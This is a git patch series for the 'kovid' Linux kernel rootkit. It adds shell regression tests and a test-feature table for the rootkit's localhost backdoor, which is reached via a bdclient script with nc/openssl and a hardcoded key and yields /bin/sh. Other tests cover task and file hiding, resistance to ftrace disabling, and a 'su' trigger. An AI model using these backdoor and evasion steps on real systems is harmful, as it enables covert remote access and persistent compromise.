From 66cd7caff4b3f8fec84b06b6bd6d85678b4cf7a0 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 2 Dec 2024 12:58:31 +0100 Subject: [PATCH 1/7] test: Add native/proc-timeout.test --- Makefile | 6 ++++-- test/native/hide-unhide-module.test | 1 + test/native/proc-timeout.test | 15 +++++++++++++++ 3 files changed, 20 insertions(+), 2 deletions(-) create mode 100644 test/native/proc-timeout.test diff --git a/Makefile b/Makefile index aa480d3..1bfdb45 100644 --- a/Makefile +++ b/Makefile @@ -16,15 +16,17 @@ UUIDGEN := $(shell uuidgen) ifndef TEST_ENV BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') +PRCTIMEOUT := 1200 else BDKEY=0x7d3b1cb572f16425 UNHIDEKEY=0x2 +PRCTIMEOUT := 120 endif # PROCNAME, /proc/ interface. COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \ - -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200 \ - -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=1200 \ + -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK \ + -DPROCNAME_MAXLEN=256 -DCPUHACK -DPRCTIMEOUT=$(PRCTIMEOUT) \ -DUUIDGEN=\"$(UUIDGEN)\" -DJOURNALCTL=\"$(JOURNALCTL)\" EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS} diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test index 13ceff5..96db504 100644 --- a/test/native/hide-unhide-module.test +++ b/test/native/hide-unhide-module.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS diff --git a/test/native/proc-timeout.test b/test/native/proc-timeout.test new file mode 100644 index 0000000..7e92de6 --- /dev/null +++ b/test/native/proc-timeout.test @@ -0,0 +1,15 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sleep 10 +sudo insmod ../../../build/kovid.ko +kill -CONT 31337 +sleep 140 +sudo dmesg +sudo rmmod kovid + +# CHECK: /proc/myprocname loaded, timeout: 120s +# CHECK: /proc/myprocname unloaded. From da9886a0f8a900afa51725b047e8b801005d8af9 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 2 Dec 2024 14:11:48 +0100 Subject: [PATCH 2/7] test: Add native/ftrace-disable-enable.test --- test/native/ftrace-disable-enable.test | 58 ++++++++++++++++++++++++++ test/native/proc-timeout.test | 1 + 2 files changed, 59 insertions(+) create mode 100644 test/native/ftrace-disable-enable.test diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test new file mode 100644 index 0000000..e2dfcc2 --- /dev/null +++ b/test/native/ftrace-disable-enable.test @@ -0,0 +1,58 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 +sudo insmod ../../../build/kovid.ko + +# Check initial value of ftrace_enabled +INITIAL_VALUE=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Initial value of ftrace_enabled: $INITIAL_VALUE" + +# Attempt to disable ftrace by writing 0 to ftrace_enabled +echo 0 > /proc/sys/kernel/ftrace_enabled +READ_VALUE=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Value of ftrace_enabled after writing 0: $READ_VALUE" + +# Verify kovid functionality using list-hidden-tasks +sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425 +echo list-hidden-tasks > /proc/myprocname +echo "Kovid functionality with ftrace_enabled=0 is working." + +# Attempt another ftrace write with a different value (e.g., 2) +echo 2 > /proc/sys/kernel/ftrace_enabled +READ_VALUE2=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Value of ftrace_enabled after writing 2: $READ_VALUE2" + + +# Verify kovid functionality again using list-hidden-tasks +echo list-hidden-tasks > /proc/myprocname +echo "Kovid functionality with ftrace_enabled=2 is working." + +# Test echo with invalid values +echo -1 > /proc/sys/kernel/ftrace_enabled +READ_INVALID=$(cat /proc/sys/kernel/ftrace_enabled) +echo "Value of ftrace_enabled after writing -1: $READ_INVALID" + +# Cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Initial value of ftrace_enabled: 1 +# CHECK: Value of ftrace_enabled after writing 0: 1 +# CHECK: Kovid functionality with ftrace_enabled=0 is working. +# CHECK: Value of ftrace_enabled after writing 2: 1 +# CHECK: Kovid functionality with ftrace_enabled=2 is working. +# CHECK: Value of ftrace_enabled after writing -1: 1 + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} +# CHECK: Got event +# CHECK: unloaded diff --git a/test/native/proc-timeout.test b/test/native/proc-timeout.test index 7e92de6..a1f80fc 100644 --- a/test/native/proc-timeout.test +++ b/test/native/proc-timeout.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS From 48aa238484fa943e534040b210755cd3e4d15b95 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 2 Dec 2024 14:45:19 +0100 Subject: [PATCH 3/7] test: Add native/nc-backdoor-remove-and-install-nc-tool.test --- docs/TestFeatures.md | 33 +++++++------ test/native/ftrace-disable-enable.test | 1 + ...c-backdoor-remove-and-install-nc-tool.test | 49 +++++++++++++++++++ 3 files changed, 68 insertions(+), 15 deletions(-) create mode 100644 test/native/nc-backdoor-remove-and-install-nc-tool.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index 7aa48b8..8d78034 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -296,18 +296,21 @@ Here are information about testing of the features available. NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should contain `# REQUIRES: DEPLOY_ONLY` marker. -| Feature | Tested | Regression Test | -| :--------------------------------------------------| :------------------------------| :------------------------------------ | -| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test | -| kovid (DEPLOY) doesn't appear in /var /sys etc. | Yes | cross/no-kovid-found.test | -| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test | -| Hide nc process | Yes | complex/nc-hide-pid{_host}.test | -| nc backdoor | Yes | native/nc-backdoor.test | -| openssl backdoor | Yes | native/openssl-backdoor.test | -| tty backdoor | Yes | native/tty-backdoor.test | -| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | -| Hide/Unhide Module | Yes | native/hide-unhide-module.test | -| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | -| hide file | Yes | native/hiden-file.test | -| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | -| unhide module | Yes | native/hide-unhide-module.test | +| Feature | Tested | Regression Test | +| :--------------------------------------------------| :------------------------------| :------------------------------------------------------| +| No tainted messages/log appear in DEPLOY | Yes | cross/no-kovid-logs-in-deploy.test | +| kovid (DEPLOY) doesn't appear in /var /sys etc. | Yes | cross/no-kovid-found.test | +| Hide/Unhide Module Test in DEBUG Mode | Yes | cross/hide-unhide-module.test | +| Hide nc process | Yes | complex/nc-hide-pid{_host}.test | +| nc backdoor | Yes | native/nc-backdoor.test | +| openssl backdoor | Yes | native/openssl-backdoor.test | +| tty backdoor | Yes | native/tty-backdoor.test | +| backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | +| Hide/Unhide Module | Yes | native/hide-unhide-module.test | +| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | +| hide file | Yes | native/hiden-file.test | +| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | +| unhide module | Yes | native/hide-unhide-module.test | +| procfile timeout | Yes | native/proc-timeout.test | +| Ftrace | Yes | native/ftrace-disable-enable.test | +| Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test | diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test index e2dfcc2..8a1903f 100644 --- a/test/native/ftrace-disable-enable.test +++ b/test/native/ftrace-disable-enable.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS diff --git a/test/native/nc-backdoor-remove-and-install-nc-tool.test b/test/native/nc-backdoor-remove-and-install-nc-tool.test new file mode 100644 index 0000000..d0b3a42 --- /dev/null +++ b/test/native/nc-backdoor-remove-and-install-nc-tool.test @@ -0,0 +1,49 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 + +# Prepare system by removing netcat (simulating backdoor tool removal) +echo "Removing netcat..." +sudo mv /usr/bin/nc /usr/bin/nc2 || echo "Netcat already removed." + +# Insert the kovid kernel module +sudo insmod ../../../build/kovid.ko + +# Attempt to establish a connection without netcat +echo "Testing connection without netcat..." +if ! sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then + echo "Connection failed as expected without netcat." +else + echo "ERROR: Connection unexpectedly succeeded without netcat." +fi + +# Restore netcat (simulating backdoor tool installation) +echo "Restoring netcat..." +sudo mv /usr/bin/nc2 /usr/bin/nc || echo "Netcat already restored." + +# Attempt to establish a connection with netcat restored +echo "Testing connection with netcat restored..." +if sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then + echo "Connection succeeded as expected with netcat restored." +else + echo "ERROR: Connection unexpectedly failed with netcat restored." +fi + +# Remove the kernel module and cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Connection failed as expected without netcat. +# CHECK: /bin/sh: 0: can't access tty; job control turned off + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: Got event +# CHECK: unloaded From cca7d7b879e0599ebdffa55f577e28b3520988f3 Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 2 Dec 2024 15:17:16 +0100 Subject: [PATCH 4/7] test: Add test/native/nc-backdoor-bdclient.test --- docs/TestFeatures.md | 1 + test/native/nc-backdoor-bdclient.test | 47 +++++++++++++++++++ ...c-backdoor-remove-and-install-nc-tool.test | 1 + 3 files changed, 49 insertions(+) create mode 100644 test/native/nc-backdoor-bdclient.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index 8d78034..041ccb7 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -314,3 +314,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | procfile timeout | Yes | native/proc-timeout.test | | Ftrace | Yes | native/ftrace-disable-enable.test | | Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test | +| bdclient.sh test | Yes | native/nc-backdoor-bdclient.test | diff --git a/test/native/nc-backdoor-bdclient.test b/test/native/nc-backdoor-bdclient.test new file mode 100644 index 0000000..646796b --- /dev/null +++ b/test/native/nc-backdoor-bdclient.test @@ -0,0 +1,47 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s &> %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 + +# Insert the kovid kernel module +sudo insmod ../../../build/kovid.ko + +# Define the number of connection attempts +NUM_ATTEMPTS=5 +SUCCESS_COUNT=0 +FAIL_COUNT=0 + +# Automate bdclient.sh for repeated connection and disconnection +for i in $(seq 1 $NUM_ATTEMPTS); do + echo "Attempt $i: Establishing connection..." + if sudo timeout 5 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425; then + echo "Connection attempt $i succeeded." + SUCCESS_COUNT=$((SUCCESS_COUNT + 1)) + else + echo "Connection attempt $i failed." + FAIL_COUNT=$((FAIL_COUNT + 1)) + fi + # Wait briefly between attempts + sleep 1 +done + +# Remove the kernel module and cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Connection received on +# CHECK: Connection received on +# CHECK: Connection received on +# CHECK: Connection received on +# CHECK: Connection received on + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: Got event +# CHECK: unloaded diff --git a/test/native/nc-backdoor-remove-and-install-nc-tool.test b/test/native/nc-backdoor-remove-and-install-nc-tool.test index d0b3a42..4c02b80 100644 --- a/test/native/nc-backdoor-remove-and-install-nc-tool.test +++ b/test/native/nc-backdoor-remove-and-install-nc-tool.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS From 3d2b4568928000460511d3798523cfc21e82056e Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 2 Dec 2024 15:30:10 +0100 Subject: [PATCH 5/7] test: Add test/native/gift-bdclient.test --- docs/TestFeatures.md | 1 + test/native/gift-bdclient.test | 46 +++++++++++++++++++++++++++ test/native/nc-backdoor-bdclient.test | 1 + 3 files changed, 48 insertions(+) create mode 100644 test/native/gift-bdclient.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index 041ccb7..cfbdcbf 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -315,3 +315,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | Ftrace | Yes | native/ftrace-disable-enable.test | | Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test | | bdclient.sh test | Yes | native/nc-backdoor-bdclient.test | +| bdclient.sh GIFT | Yes | test/native/gift-bdclient.test | diff --git a/test/native/gift-bdclient.test b/test/native/gift-bdclient.test new file mode 100644 index 0000000..e56247a --- /dev/null +++ b/test/native/gift-bdclient.test @@ -0,0 +1,46 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 + +# Insert the kovid kernel module +sudo insmod ../../../build/kovid.ko + +# Test parameters +REMOTE_IP="127.0.0.1" # Use localhost for the remote IP +REMOTE_PORT="9999" +BACKDOOR_KEY="0x7d3b1cb572f16425" +GIFT_IP="127.0.0.1" # Use localhost for GIFT + +# Test connection without GIFT +echo "Testing connection without GIFT..." +if GIFT="" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then + echo "Connection without GIFT succeeded." +else + echo "ERROR: Connection without GIFT failed." +fi + +# Test connection with GIFT +echo "Testing connection with GIFT..." +if GIFT="$GIFT_IP" sudo ../../../scripts/bdclient.sh openssl "$REMOTE_IP" "$REMOTE_PORT" "$BACKDOOR_KEY"; then + echo "Connection with GIFT succeeded." +else + echo "ERROR: Connection with GIFT failed." +fi + +# Cleanup +sudo rmmod kovid +sudo dmesg + +# CHECK: Connection without GIFT succeeded. +# CHECK: Connection with GIFT succeeded. + +# CHECK: kv: using kprobe for kallsyms_lookup_name +# CHECK: Waiting for event +# CHECK: loaded +# CHECK: Got event +# CHECK: unloaded diff --git a/test/native/nc-backdoor-bdclient.test b/test/native/nc-backdoor-bdclient.test index 646796b..f6ce207 100644 --- a/test/native/nc-backdoor-bdclient.test +++ b/test/native/nc-backdoor-bdclient.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS From 48dfb6def6f0d595c34ee06662c0064254281ded Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 2 Dec 2024 18:37:33 +0100 Subject: [PATCH 6/7] test: Add test/native/kaudit.test --- docs/TestFeatures.md | 1 + test/native/gift-bdclient.test | 1 + test/native/kaudit.test | 19 +++++++++++++++++++ 3 files changed, 21 insertions(+) create mode 100644 test/native/kaudit.test diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index cfbdcbf..2cbada8 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -316,3 +316,4 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | Remove netcat and install again (backdoors) | Yes | native/nc-backdoor-remove-and-install-nc-tool.test | | bdclient.sh test | Yes | native/nc-backdoor-bdclient.test | | bdclient.sh GIFT | Yes | test/native/gift-bdclient.test | +| Kaudit | Yes | test/native/kaudit.test | diff --git a/test/native/gift-bdclient.test b/test/native/gift-bdclient.test index e56247a..e9bbb0a 100644 --- a/test/native/gift-bdclient.test +++ b/test/native/gift-bdclient.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS diff --git a/test/native/kaudit.test b/test/native/kaudit.test new file mode 100644 index 0000000..9e2e37d --- /dev/null +++ b/test/native/kaudit.test @@ -0,0 +1,19 @@ +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 10 +sudo insmod ../../../build/kovid.ko +kill -CONT 999 +su +exit +sudo rmmod kovid +sudo dmesg + +# CHECK: loaded. +# CHECK: Cool! Now try 'su' +# CHECK: Uninstalling: 'sys_exit_group' syscall=1 +# CHECK: unloaded. From f2aa193fdb7d03ed6a0827353bbbd911c6408b8f Mon Sep 17 00:00:00 2001 From: djtodoro Date: Mon, 2 Dec 2024 20:19:07 +0100 Subject: [PATCH 7/7] Add todo for native/ftrace-disable-enable.test --- test/native/ftrace-disable-enable.test | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/test/native/ftrace-disable-enable.test b/test/native/ftrace-disable-enable.test index 8a1903f..dd4d9bf 100644 --- a/test/native/ftrace-disable-enable.test +++ b/test/native/ftrace-disable-enable.test @@ -57,3 +57,10 @@ sudo dmesg # CHECK: hide: {{.*}} # CHECK: Got event # CHECK: unloaded + +# FIXME: It should print +# Value of ftrace_enabled after writing 2: 1 +# Value of ftrace_enabled after writing 0: 0 +# etc. +# I have tried manually, as root, and it works. +# I am not sure why `sudo su` did not make difference here.